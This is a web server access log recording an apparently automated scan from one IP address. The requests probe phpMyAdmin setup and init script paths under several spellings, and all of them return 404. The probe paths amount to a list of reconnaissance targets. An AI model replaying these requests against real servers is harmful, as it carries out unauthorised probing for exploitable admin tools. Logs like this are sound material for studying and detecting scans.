146.196.82.203 - - [02/Feb/2020:23:53:10 +0100] "GET /phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:53:10 +0100] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:53:11 +0100] "GET /scripts/db___.init.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:53:11 +0100] "GET /phpmyadmin/scripts/db___.init.php HTTP/1.1" 404 338 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:53:11 +0100] "GET /phpMyAdmin/scripts/db___.init.php HTTP/1.1" 404 338 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:53:11 +0100] "GET /pma/scripts/setup.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:53:12 +0100] "GET /PMA/scripts/setup.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:53:12 +0100] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:53:12 +0100] "GET /MyAdmin/scripts/setup.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:53:13 +0100] "GET /pma/scripts/db___.init.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:53:14 +0100] "GET /PMA/scripts/db___.init.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
146.196.82.203 - - [02/Feb/2020:23:53:14 +0100] "GET /myadmin/scripts/db___.init.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0"
